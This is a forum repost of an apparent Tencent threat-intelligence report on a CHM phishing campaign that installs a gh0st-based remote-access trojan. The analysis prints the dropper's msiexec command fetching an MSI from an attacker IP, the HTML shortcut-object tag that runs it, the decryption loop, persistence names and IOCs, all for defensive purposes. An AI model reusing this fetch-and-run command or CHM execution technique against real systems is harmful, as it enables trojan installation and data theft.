本帖最后由 腾讯电脑管家 于 2019-8-29 10:54 编辑
一、背景腾讯安全御见威胁情报中心检测到利用CHM文件进行钓鱼攻击的威胁事件呈增长趋势。黑客构造以“手机截图”、“会员充值”、“游戏账号”、“挂机软件”等命名的chm诱饵文件,将其通过聊天工具进行投递,针对“好奇心强”用户、游戏玩家以及某些支付平台的用户进行攻击。用户打开恶意CHM文档,内嵌的恶意代码会通过MSI包文件安装gh0st远程控制木马,最终导致中毒用户隐私信息泄露,或可造成经济损失。腾讯安全专家将该病毒命名为FakeChmMsi木马,建议用户使用腾讯电脑管家或腾讯御点拦截。 CHM文件格式是微软推出的基于HTML文件特性的帮助文件系统,也称作“已编译的HTML帮助文件”。CHM能够支持脚本、Flash、图片、音频、视频等内容,并且同样支持超链接目录、索引以及全文检索功能,常用来制作说明文档、帮助文档、电子书等以方便查阅,在绝大多数人的印象中,CHM类型文件是“无公害”文档文件。 由于用户容易信任此类文件而容易双击打开,同时杀毒软件识别该类文件为恶意属性的几率较低(非PE文件不适合采样),导致该类攻击成功率较高。据腾讯安全御见威胁情报中心的监测数据,此次攻击的受害者主要集中在河南、江苏、重庆等地区。
二、详细分析此次攻击中使用的主要技术特点为: 1、 使用Microsoft Software Installation (.msi文件)进行释放和安装木马; 2、 “白+黑”攻击,利用加速器、游戏程序等正规文件来启动木马; 3、 将恶意代码保存在数字证书格式文件(.CRT)中,运行时读取解密。 CHM文件是经过压缩的各类资源的集合,使用7z解压软件直接打开木马样本,如图所示,可以发现CHM文件内部包含一个index.htm文件。 Index.htm文件内包含一段经过高强度混淆的JavaScript代码,该代码通过解析恶意的标签执行命令 msiexec.exe,/i http[:]//211.149.138.144:800/Microsoft%20Visual4.msi,从而下载一个使用Windows Installer打包的恶意程序Microsoft Visual4.msi,保存到‘’C:\Users\Public\Downloads\Updata目录下,并启动安装过程。 (注:Windows Installer使用Microsoft Software Installation (MSI)包文件来安装程序,每个包文件都有一个关系型数据库,其中包含安装或删除程序所需的指令和数据。) JavaScript代码如下: 包含命令的恶意标签如下: <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> </OBJECT> Microsoft Visual4.msi运行后释放三个文件到C:\Program\update目录下(另一个DLL文件在运行时产生)。 其中strcmp.exe是某网络加速器公司的正规程序,其运行后会自动加载同目录下的DLL文件queryInstallLsp.dll(由恶意程序替换而来),从而达到“白+黑”利用启动。 随后queryInstallLsp.dll读取伪装成安全证书文件的activeds.crt中的内容以获取后续恶意代码。 读取后在DEEncrpytBuffer中进行解密,解密算法如下。包括异或及加法运算,其中*a1指向加密数据,v6为常数。 for ( i = 0; ; ++i ) { result = i; if ( i >= a2 ) break; *a1 ^= v6; *a1++ += v6; } 然后将解密出的PE格式数据加载到内存地址0x1000000处,获得其导出函数“A1”的地址并创建新的线程执行。 远控木马分析发现,内存中最终执行的PE程序为经过gh0st修改而成的远控木马。 木马具有以下功能: 1.监控屏幕 2.键盘记录 3.监控摄像头、麦克风 4.下载执行恶意程序 5.远程关机和重启 6.远程执行shell命令 7.枚举文件、进程 在以参数“-Protect”执行时打开互斥体"ProtectThread2016",在以参数“-run”执行时打开互斥体”AABBCCDD“,使得木马在完成不同功能时独立运行。 木马与控制端通信采用异步I/O模型,同时会创建和设置事件来保证通信时不发生阻塞。 创建的事件名为:“Global\\ AABBCCDD -KIllEvent-LOGIN1” 然后获取电脑MAC地址 获取系统版本,位数 获取CPU频率 获取杀软信息 将搜集的信息加密并发送至服务器。
最后进入while循环,等待接收指令完成各类远控操作。 将C:\ProgramData\update\strcmp.exe分别添加到Run启动项,计划任务进行持久化。 启动项名称:“Microsoft Visual” 计划任务名:“build-udf”
三、溯源分析我们将木马使用的其中一个C2地址211.149.138.144到腾讯安图高级威胁溯源系统进行查询,发现执行该地址的另一个域名 www[.]haitalk.top。 进一步查询www[.]haitalk.top的注册信息,可以发现注册者jia***eiye,和注册邮箱对应的QQ:760***338。该QQ号的个性签名上显示其擅长黑客技术,并且还开通公众号传播相关内容,据此推测该人员与此次攻击事件有一定关联。
四、安全建议1、 已中招的用户可以使用腾讯电脑管家或腾讯御点清除病毒; 2、 手动清理可采用以下步骤: 删除文件: C:\ProgramData\update\strcmp.exe C:\ProgramData\update\queryInstallLsp.dll C:\ProgramData\update\activeds.crt C:\ProgramData\update\SystemJunctionx64.dll 删除启动项:“Microsoft Visual” 删除计划任务:“build-udf” 3、 不要随意点开通过电子邮件或聊天工具发送的陌生文件,切莫认为CHM文件是“无害”文档而掉以轻心; 4、 加强内外网隔离,对没有联网需求的服务器/工作站内部访问设置相应控制,防止因为单点失陷造成重要数据泄露; 6、 使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCsC&C 112.67.39.84:10610 MD5 6e0ab53652b6682cf57c5e3daa602c7c f5d1e6ab6ce6b6dfbbd046263a52f01e 2cc2140db166284523ff448e68621496 40d24c62f281df84a077b8cd11b51995 41afa984abe6260b94e3f1e6d7ed0065 c755bf080c33f16ce7a97439918bc7ba fa065799e9bd8b9978bc99fefbeba8b6 dfc6a88d636216dc3923e4d7f6accfd2 ef9fa8011690ad892dd8cab833e001d8 Domain www.yiquanko.com manage.jeug8.cn www.haofafx.cn www.wdfs9.cn www.mu91y.cn www.rrdlw.cn manage.xxnnmmh.cn IP 103.39.216.195 180.215.222.242 103.121.93.54 211.149.138.144 URL hxxp[:]//103.39.216.195:9800/4.msi hxxp[:]//103.39.216.195:9800/3.msi hxxp[:]//180.215.222.242/180215222239.msi hxxp[:]//103.121.93.54/1.msi hxxp[:]//180.215.222.242/211149.msi hxxp[:]//211.149.138.144:800/Microsoft Visual4.msi
| 
发表于 2019-8-29 10:53:44
